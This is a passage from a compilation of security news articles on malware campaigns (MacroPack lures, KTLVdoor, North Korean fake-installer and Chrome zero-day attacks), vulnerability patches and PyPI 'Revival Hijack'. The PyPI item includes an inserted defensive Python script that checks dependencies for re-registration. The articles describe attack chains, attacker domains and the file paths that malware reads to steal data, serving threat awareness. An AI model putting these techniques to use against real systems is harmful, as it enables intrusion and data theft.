The cybersecurity company said it found artifacts uploaded to VirusTotal from China, Pakistan, Russia, and the U.S. that were all generated by MacroPack and used to deliver various payloads such as Havoc, Brute Ratel, and a new variant of PhantomCore, a remote access trojan (RAT) attributed to a hacktivist group named Head Mare.
"A common feature in all the malicious documents we dissected that caught our attention is the existence of four non-malicious VBA subroutines," Talos researcher Vanja Svajcer said.
"These subroutines appeared in all the samples and were not obfuscated. They also had never been used by any other malicious subroutines or anywhere else in any documents."
An important aspect to note here is that the lure themes spanning these documents are varied, ranging from generic topics that instruct users to enable macros to official-looking documents that appear to come from military organizations. This suggests the involvement of distinct threat actors.
Some of the documents have also been observed taking advantage of advanced features offered as part of MacroPack to bypass anti-malware heuristic detections by concealing the malicious functionality using Markov chains to create seemingly meaningful functions and variable names.
The attack chains, observed between May and July 2024, follow a three-step process that entails sending a booby-trapped Office document containing MacroPack VBA code, which then decodes a next-stage payload to ultimately fetch and execute the final malware.
The development is a sign that threat actors are constantly updating tactics in response to disruptions and taking more sophisticated approaches to code execution.
New Cross-Platform Malware KTLVdoor Discovered in Attack on Chinese Trading Firm
5.9.24 Virus The Hacker News
The Chinese-speaking threat actor known as Earth Lusca has been observed using a new backdoor dubbed KTLVdoor as part of a cyber attack targeting an unnamed trading company based in China.
The previously unreported malware is written in Golang, and thus is a cross-platform weapon capable of targeting both Microsoft Windows and Linux systems.
"KTLVdoor is a highly obfuscated malware that masquerades as different system utilities, allowing attackers to carry out a variety of tasks including file manipulation, command execution, and remote port scanning," Trend Micro researchers Cedric Pernet and Jaromir Horejsi said in an analysis published Wednesday.
Some of the tools KTLVdoor impersonates include sshd, Java, SQLite, bash, and edr-agent, among others, with the malware distributed in the form of dynamic-link library (.dll) or a shared object (.so).
Perhaps the most unusual aspect of the activity cluster is the discovery of more than 50 command-and-control (C&C) servers, all hosted at Chinese company Alibaba, that have been identified as communicating with variants of the malware, raising the possibility that the infrastructure could be shared with other Chinese threat actors.
Earth Lusca is known to be active since at least 2021, orchestrating cyber attacks against public and private sector entities across Asia, Australia, Europe, and North America. It's assessed to share some tactical overlaps with other intrusion sets tracked as RedHotel and APT27 (aka Budworm, Emissary Panda, and Iron Tiger).
KTLVdoor, the latest addition to the group's malware arsenal, is highly obfuscated and gets its name from the use of a marker called "KTLV" in its configuration file that includes various parameters necessary to meet its functions, including the C&C servers to connect to.
Once initialized, the malware initiates contact with the C&C server on a loop, awaiting further instructions to be executed on the compromised host. The supported commands allow it to download/upload files, enumerate the file system, launch an interactive shell, run shellcode, and initiate scanning using ScanTCP, ScanRDP, DialTLS, ScanPing, and ScanWeb, among others.
That said, not much is known about how the malware is distributed and whether it has been used to target other entities across the world.
"This new tool is used by Earth Lusca, but it might also be shared with other Chinese-speaking threat actors," the researchers noted. "Seeing that all C&C servers were on IP addresses from China-based provider Alibaba, we wonder if the whole appearance of this new malware and the C&C server could not be some early stage of testing new tooling."
Cisco Fixes Two Critical Flaws in Smart Licensing Utility to Prevent Remote Attacks
5.9.24 Vulnerability The Hacker News
Cisco has released security updates for two critical security flaws impacting its Smart Licensing Utility that could allow unauthenticated, remote attackers to elevate their privileges or access sensitive information.
A brief description of the two vulnerabilities is below -
CVE-2024-20439 (CVSS score: 9.8) - The presence of an undocumented static user credential for an administrative account that an attacker could exploit to log in to an affected system
CVE-2024-20440 (CVSS score: 9.8) - A vulnerability arising due to an excessively verbose debug log file that an attacker could exploit to access such files by means of a crafted HTTP request and obtain credentials that can be used to access the API
While these shortcomings are not dependent on each other for them to be successful, Cisco notes in its advisory that they "are not exploitable unless Cisco Smart Licensing Utility was started by a user and is actively running."
The flaws, which were discovered during internal security testing, also do not affect Smart Software Manager On-Prem and Smart Software Manager Satellite products.
Users of Cisco Smart License Utility versions 2.0.0, 2.1.0, and 2.2.0 are advised to update to a fixed release. Version 2.3.0 of the software is not susceptible to the bug.
Cisco has also released updates to resolve a command injection vulnerability in its Identity Services Engine (ISE) that could permit an authenticated, local attacker to run arbitrary commands on an underlying operating system and elevate privileges to root.
The flaw, tracked as CVE-2024-20469 (CVSS score: 6.0), requires an attacker to have valid administrator privileges on an affected device.
"This vulnerability is due to insufficient validation of user-supplied input," the company said. "An attacker could exploit this vulnerability by submitting a crafted CLI command. A successful exploit could allow the attacker to elevate privileges to root."
It impacts the following versions -
Cisco ISE 3.2 (3.2P7 - Sep 2024)
Cisco ISE 3.3 (3.3P4 - Oct 2024)
The company has also warned that a proof-of-concept (PoC) exploit code is available, although it's not aware of any malicious exploitation of the bug.
North Korean Hackers Target Job Seekers with Fake FreeConference App
5.9.24 APT The Hacker News
North Korean threat actors have leveraged a fake Windows video conferencing application impersonating FreeConference.com to backdoor developer systems as part of an ongoing financially-driven campaign dubbed Contagious Interview.
The new attack wave, spotted by Singaporean company Group-IB in mid-August 2024, is yet another indication that the activity is also leveraging native installers for Windows and Apple macOS to deliver malware.
Contagious Interview, also tracked as DEV#POPPER, is a malicious campaign orchestrated by a North Korean threat actor tracked by CrowdStrike under the moniker Famous Chollima.
The attack chains begin with a fictitious job interview, tricking job seekers into downloading and running a Node.js project that contains the BeaverTail downloader malware, which in turn delivers InvisibleFerret, a cross-platform Python backdoor that's equipped with remote control, keylogging, and browser stealing capabilities.
Some iterations of BeaverTail, which also functions as an information stealer, have manifested in the form of JavaScript malware, typically distributed via bogus npm packages as part of a purported technical assessment during the interview process.
But that changed in July 2024 when Windows MSI installer and Apple macOS disk image (DMG) files masquerading as the legitimate MiroTalk video conferencing software were discovered in the wild, acting as a conduit to deploy an updated version of BeaverTail.
The latest findings from Group-IB, which has attributed the campaign to the infamous Lazarus Group, suggest that the threat actor is continuing to lean on this specific distribution mechanism, the only difference being that the installer ("FCCCall.msi") mimics FreeConference.com instead of MiroTalk.
It's believed that the phony installer is downloaded from a website named freeconference[.]io, which uses the same registrar as the fictitious mirotalk[.]net website.
"In addition to Linkedin, Lazarus is also actively searching for potential victims on other job search platforms such as WWR, Moonlight, Upwork, and others," security researcher Sharmine Low said.
"After making initial contact, they would often attempt to move the conversation onto Telegram, where they would then ask the potential interviewees to download a video conferencing application, or a Node.js project, to perform a technical task as part of the interview process."
In a sign that the campaign is undergoing active refinement, the threat actors have been observed injecting the malicious JavaScript into both cryptocurrency- and gaming-related repositories. The JavaScript code, for its part, is designed to retrieve the BeaverTail JavaScript code from the domain ipcheck[.]cloud or regioncheck[.]net.
It's worth mentioning here that this behavior was also recently highlighted by software supply chain security firm Phylum in connection with an npm package named helmet-validate, suggesting that the threat actors are simultaneously making use of different propagation vectors.
Another notable change is that BeaverTail is now configured to extract data from more cryptocurrency wallet extensions such as Kaikas, Rabby, Argent X, and Exodus Web3, in addition to implementing functionality to establish persistence using AnyDesk.
That's not all. BeaverTail's information-stealing features are now realized through a set of Python scripts, collectively called CivetQ, which is capable of harvesting cookies, web browser data, keystrokes, and clipboard content, and delivering more scripts. A total of 74 browser extensions are targeted by the malware.
"The malware is able to steal data from Microsoft Sticky Notes by targeting the application's SQLite database files located at `%LocalAppData%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite`, where user notes are stored in an unencrypted format," Low said.
"By querying and extracting data from this database, the malware can retrieve and exfiltrate sensitive information from the victim's Sticky Notes application."
The emergence of CivetQ points to a modularized approach, while also underscoring that the tools are under active development and have been constantly evolving in little increments over the past few months.
"Lazarus has updated their tactics, upgraded their tools, and found better ways to conceal their activities," Low said. "They show no signs of easing their efforts, with their campaign targeting job seekers extending into 2024 and to the present day. Their attacks have become increasingly creative, and they are now expanding their reach across more platforms."
The disclosure comes as the U.S. Federal Bureau of Investigation (FBI) warned of North Korean cyber actors' aggressive targeting of the cryptocurrency industry using "well-disguised" social engineering attacks to facilitate cryptocurrency theft.
"North Korean social engineering schemes are complex and elaborate, often compromising victims with sophisticated technical acumen," the FBI said in an advisory released Tuesday, stating the threat actors scout prospective victims by reviewing their social media activity on professional networking or employment-related platforms.
"Teams of North Korean malicious cyber actors identify specific DeFi or cryptocurrency-related businesses to target and attempt to socially engineer dozens of these companies' employees to gain unauthorized access to the company's network."
Android Users Urged to Install Latest Security Updates to Fix Actively Exploited Flaw
5.9.24 OS The Hacker News
Google has released its monthly security updates for the Android operating system to address a known security flaw that it said has come under active exploitation in the wild.
The high-severity vulnerability, tracked as CVE-2024-32896 (CVSS score: 7.8), relates to a case of privilege escalation in the Android Framework component.
According to the description of the bug in the NIST National Vulnerability Database (NVD), it concerns a logic error that could lead to local escalation of privileges without requiring any additional execution privileges.
"There are indications that CVE-2024-32896 may be under limited, targeted exploitation," Google said in its Android Security Bulletin for September 2024.
It's worth noting that CVE-2024-32896 was first disclosed in June 2024 as impacting only the Google-owned Pixel lineup.
There are currently no details on how the vulnerability is being exploited in the wild, although GrapheneOS maintainers revealed that CVE-2024-32896 plugs a partial solution for CVE-2024-29748, another Android flaw that has been weaponized by forensic companies.
Google later confirmed to The Hacker News that the impact of CVE-2024-32896 goes beyond Pixel devices to include the entire Android ecosystem and that it's working with original equipment manufacturers (OEMs) to apply the fixes where applicable.
"This vulnerability requires physical access to the device to exploit and interrupts the factory reset process," Google noted at the time. "Additional exploits would be needed to compromise the device."
"We are prioritizing applicable fixes for other Android OEM partners and will roll them out as soon as they are available. As a best security practice, users should always update their devices whenever there are new security updates available."
Researchers Find Over 22,000 Removed PyPI Packages at Risk of Revival Hijack
5.9.24 Hacking The Hacker News
A new supply chain attack technique targeting the Python Package Index (PyPI) registry has been exploited in the wild in an attempt to infiltrate downstream organizations.
It has been codenamed Revival Hijack by software supply chain security firm JFrog, which said the attack method could be used to hijack 22,000 existing PyPI packages and result in "hundreds of thousands" of malicious package downloads. These susceptible packages have more than 100,000 downloads or have been active for over six months.
"This attack technique involves hijacking PyPI software packages by manipulating the option to re-register them once they're removed from PyPI's index by the original owner," JFrog security researchers Andrey Polkovnychenko and Brian Moussalli said in a report shared with The Hacker News.
At its core, the attack hinges on the fact that Python packages published in the PyPI repository may get removed, making available the names of those deleted projects for registration to any other user.
Statistics shared by JFrog show that about 309 packages are removed each month on average. These could happen for any number of reasons: Lack of maintenance (i.e., abandonware), package getting re-published under a different name, or introducing the same functionality into official libraries or built-in APIs.
This creates an attack surface that's more effective than typosquatting: an attacker, using their own account, could publish a malicious package under the same name with a higher version number to infect developer environments.
"The technique does not rely on the victim making a mistake when installing the package," the researchers said, pointing out how Revival Hijack can yield better results from the point of view of an adversary. "Updating a 'once safe' package to its latest version is viewed as a safe operation by many users."
While PyPI does have safeguards in place against author impersonation and typosquatting attempts, JFrog's analysis found that running the "pip list --outdated" command lists the counterfeit package as a new version of the original package, even though the former is a different package from an entirely different author.
Even more concerning, running the "pip install --upgrade" command replaces the actual package with the phony one without so much as a warning that the package's author has changed, potentially exposing unwitting developers to a huge software supply chain risk.
JFrog said it took the step of creating a new PyPI user account called "security_holding" that it used to safely hijack the susceptible packages and replace them with empty placeholders so as to prevent malicious actors from capitalizing on the removed packages.
Additionally, each of these packages has been assigned the version number 0.0.0.1, the opposite of a dependency confusion attack scenario, to avoid getting pulled by developers when running a pip upgrade command.
What's more disturbing is that Revival Hijack has already been exploited in the wild, with an unknown threat actor called Jinnis introducing a benign version of a package named "pingdomv3" on March 30, 2024, the same day the original owner (cheneyyan) removed the package from PyPI.
On April 12, 2024, the new developer is said to have released an update containing a Base64-encoded payload that checks for the presence of the "JENKINS_URL" environment variable, and if present, executes an unknown next-stage module retrieved from a remote server.
"This suggests that the attackers either delayed the delivery of the attack or designed it to be more targeted, possibly limiting it to a specific IP range," JFrog said.
The new attack is a sign that threat actors are eyeing supply chain attacks on a broader scale by targeting deleted PyPI packages in order to expand the reach of the campaigns. Organizations and developers are recommended to inspect their DevOps pipelines to ensure that they are not installing packages that have been already removed from the repository.
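A defender-side check for the re-registration pattern described above, added here as an example and not JFrog's or PyPI's code. It assumes a lockfile-style record of each pin (version, artifact sha256, author at pin time) and the shape of PyPI's per-package JSON metadata; every package name, hash and author in the sample data is constructed.

```python
"""Flag PyPI dependencies whose index state is inconsistent with what was pinned.

Added example for the Revival Hijack technique described above; it is not
JFrog's or PyPI's code. It compares a project's lockfile-style record of a
dependency (version, sha256, author) with the package's current PyPI JSON
metadata, i.e. the shape returned by https://pypi.org/pypi/<name>/json.
All package names, versions, hashes and authors below are constructed.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple


@dataclass(frozen=True)
class Pinned:
    """What the project recorded the last time it resolved this dependency."""
    name: str
    version: str
    sha256: str   # digest of the artifact that was actually installed
    author: str   # author/maintainer shown by the index at that time


def _version_key(version: str) -> Tuple[int, ...]:
    """Crude numeric ordering ('1.10.0' > '1.9.2'); enough for this check."""
    key = []
    for part in version.split("."):
        digits = "".join(ch for ch in part if ch.isdigit())
        key.append(int(digits) if digits else 0)
    return tuple(key)


def check_package(pinned: Pinned, pypi_json: dict) -> List[str]:
    """Return human-readable reasons this dependency needs review (empty = ok).

    Revival Hijack leaves a recognisable trace in the index: the releases the
    project once installed are gone (the original owner deleted the project),
    a different author now owns the name, and the replacement carries a higher
    version so that `pip install --upgrade` swaps it in without complaint.
    """
    reasons: List[str] = []
    releases: Dict[str, list] = pypi_json.get("releases", {})
    info: dict = pypi_json.get("info", {})
    pin_key = _version_key(pinned.version)
    live = {v: files for v, files in releases.items() if files}  # skip empty/yanked

    files = live.get(pinned.version)
    if files is None:
        reasons.append(f"pinned version {pinned.version} no longer exists on the index")
        if live and all(_version_key(v) > pin_key for v in live):
            reasons.append("no original release survives and a higher version is offered: "
                           "consistent with a re-registered (revived) name")
        elif live and all(_version_key(v) < pin_key for v in live):
            # Placeholders are published below every real version (e.g. 0.0.0.1)
            # so upgrades never pull them: the dependency is abandoned, not hijacked.
            reasons.append("only placeholder releases below the pin remain: dependency is abandoned")
    else:
        digests = {f.get("digests", {}).get("sha256") for f in files}
        if pinned.sha256 not in digests:
            reasons.append(f"artifact hash for {pinned.version} differs from the pinned sha256")

    current_author = info.get("author") or info.get("maintainer") or ""
    if current_author and current_author != pinned.author:
        reasons.append(f"author changed from {pinned.author!r} to {current_author!r}")
    return reasons


def audit(pins: Iterable[Pinned], index: Dict[str, dict]) -> Dict[str, List[str]]:
    """Run check_package over a set of pins; returns only packages with findings."""
    report: Dict[str, List[str]] = {}
    for pin in pins:
        reasons = check_package(pin, index.get(pin.name, {}))
        if reasons:
            report[pin.name] = reasons
    return report


# --- constructed sample data (hypothetical packages) ------------------------
SAMPLE_PINS = [
    Pinned("orderly-utils", "1.4.2", "a1" * 32, "orig-dev"),    # will be hijacked
    Pinned("steady-lib", "2.0.0", "b2" * 32, "steady-team"),    # healthy
    Pinned("old-helper", "0.9.0", "c3" * 32, "helper-author"),  # held by placeholder
]

SAMPLE_INDEX = {
    # Original 1.x history is gone; a new author offers 1.5.0.
    "orderly-utils": {"info": {"author": "new-uploader"},
                      "releases": {"1.5.0": [{"digests": {"sha256": "d4" * 32}}]}},
    # Pinned artifact still present with the same hash; a newer release exists too.
    "steady-lib": {"info": {"author": "steady-team"},
                   "releases": {"2.0.0": [{"digests": {"sha256": "b2" * 32}}],
                                "2.1.0": [{"digests": {"sha256": "e5" * 32}}]}},
    # Deleted and replaced by a placeholder version that sorts below every real one.
    "old-helper": {"info": {"author": "placeholder-holder"},
                   "releases": {"0.0.0.1": [{"digests": {"sha256": "f6" * 32}}]}},
}

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_PINS, SAMPLE_INDEX).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

At install time, `pip install --require-hashes` against a hash-pinned requirements file gives the same protection, since a re-registered artifact will not match the recorded digest.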
"Using a vulnerable behavior in the handling of removed packages allowed attackers to hijack existing packages, making it possible to install it to the target systems without any changes to the user's workflow," said Moussalli, JFrog Security Research Team Lead.
"The PyPI package attack surface is continually growing. Despite proactive intervention here, users should always stay vigilant and take the necessary precautions to protect themselves and the PyPI community from this hijack technique."
North Korean Hackers Deploy FudModule Rootkit via Chrome Zero-Day Exploit
1.9.24 Exploit The Hacker News
A recently patched security flaw in Google Chrome and other Chromium web browsers was exploited as a zero-day by North Korean actors in a campaign designed to deliver the FudModule rootkit.
The development is indicative of the persistent efforts made by the nation-state adversary, which has made a habit of incorporating rafts of Windows zero-day exploits into its arsenal in recent months.
Microsoft, which detected the activity on August 19, 2024, attributed it to a threat actor it tracks as Citrine Sleet (formerly DEV-0139 and DEV-1222), which is also known as AppleJeus, Labyrinth Chollima, Nickel Academy, and UNC4736. It's assessed to be a sub-cluster within the Lazarus Group (aka Diamond Sleet and Hidden Cobra).
It's worth mentioning that the use of the AppleJeus malware has been previously also attributed by Kaspersky to another Lazarus subgroup called BlueNoroff (aka APT38, Nickel Gladstone, and Stardust Chollima), indicative of the infrastructure and toolset sharing between these threat actors.
"Citrine Sleet is based in North Korea and primarily targets financial institutions, particularly organizations and individuals managing cryptocurrency, for financial gain," the Microsoft Threat Intelligence team said.
"As part of its social engineering tactics, Citrine Sleet has conducted extensive reconnaissance of the cryptocurrency industry and individuals associated with it."
The attack chains typically involve setting up fake websites masquerading as legitimate cryptocurrency trading platforms that seek to trick users into installing weaponized cryptocurrency wallets or trading applications that facilitate the theft of digital assets.
The observed zero-day exploit attack by Citrine Sleet involved the exploitation of CVE-2024-7971, a high-severity type confusion vulnerability in the V8 JavaScript and WebAssembly engine that could allow threat actors to gain remote code execution (RCE) in the sandboxed Chromium renderer process. It was patched by Google as part of updates released last week.
As previously stated by The Hacker News, CVE-2024-7971 is the third actively exploited type confusion bug in V8 that Google resolved this year after CVE-2024-4947 and CVE-2024-5274.
It's currently not clear how widespread these attacks were or who was targeted, but the victims are said to have been directed to a malicious website named voyagorclub[.]space likely through social engineering techniques, thereby triggering an exploit for CVE-2024-7971.
The RCE exploit, for its part, paves the way for the retrieval of shellcode containing a Windows sandbox escape exploit (CVE-2024-38106) and the FudModule rootkit, which is used to establish admin-to-kernel access to Windows-based systems, providing read/write primitives and performing direct kernel object manipulation.
CVE-2024-38106, a Windows kernel privilege escalation bug, is one of the six actively exploited security flaws that Microsoft remediated as part of its August 2024 Patch Tuesday update. That said, the Citrine Sleet-linked exploitation of the flaw has been found to have occurred after the fix was released.
"This may suggest a 'bug collision,' where the same vulnerability is independently discovered by separate threat actors, or knowledge of the vulnerability was shared by one vulnerability researcher to multiple actors," Microsoft said.
CVE-2024-7971 is also the third vulnerability that North Korean threat actors have leveraged this year to drop the FudModule rootkit, following CVE-2024-21338 and CVE-2024-38193, both of which are privilege escalation flaws in built-in Windows drivers and were fixed by Microsoft in February and August, respectively.
"The CVE-2024-7971 exploit chain relies on multiple components to compromise a target, and this attack chain fails if any of these components are blocked, including CVE-2024-38106," the company said.
"Zero-day exploits necessitate not only keeping systems up to date, but also security solutions that provide unified visibility across the cyberattack chain to detect and block post-compromise attacker tools and malicious activity following exploitation."